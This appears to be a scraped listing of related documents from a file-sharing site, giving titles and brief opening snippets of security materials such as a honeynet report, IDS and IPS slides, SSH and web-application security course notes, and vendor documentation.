More informationHoneynet Weekly Report Canadian Institute for Cybersecurity (CIC)
Report (11) Captured from 04-05-2018 to 18-05-2018 1-Introduction The first honeypot studies released by Clifford Stoll in 1990, and from April 2008 the Canadian Honeynet chapter was founded at the University
More informationProtection and Security
Protection and Security Security: policy for controlling access to system Protection: mechanism implementing security policy Why: users can do bad things to system either maliciously or unintentionally
More informationPractical Magic with SSH. By David F. Skoll Roaring Penguin Software Inc. 1 February
Practical Magic with SSH By David F. Skoll Roaring Penguin Software Inc. 1 February 2001 http://www.roaringpenguin.com dfs@roaringpenguin.com Overview of Presentation Why SSH? Problems with Telnet & Friends
More informationControl Center Release Notes
Control Center Notes 1.5.1 Zenoss, Inc. www.zenoss.com Control Center Notes Copyright 2018 Zenoss, Inc. All rights reserved. Zenoss, Own IT, and the Zenoss logo are trademarks or registered trademarks
More informationFighting bad guys with an IPS from scratch
Fighting bad guys with an IPS from scratch Daniel Conde Rodríguez BS Computer Engineer PCAE - LFCS Webhosting Service Operations Team Coordinator Acens (Telefónica) @daconde2 www.linkedin.com/in/daniconde
More informationIntrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng
Intrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng 1 Internet Security Mechanisms Prevent: Firewall, IPsec, SSL Detect: Intrusion Detection Survive/ Response:
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationBIG-IP Application Security Manager : Implementations. Version 13.0
BIG-IP Application Security Manager : Implementations Version 13.0 Table of Contents Table of Contents Preventing DoS Attacks on Applications... 13 What is a DoS attack?...13 About recognizing DoS attacks...
More informationFive Code RED Security Threats to Windows Servers How to Detect them The Importance of Consolidation, Detection Enterprise Security Series
Five Code RED Security Threats to Windows Servers How to Detect them The Importance of Consolidation, Detection Enterprise Security Series Abstract How important is it for your organization to stop an
More information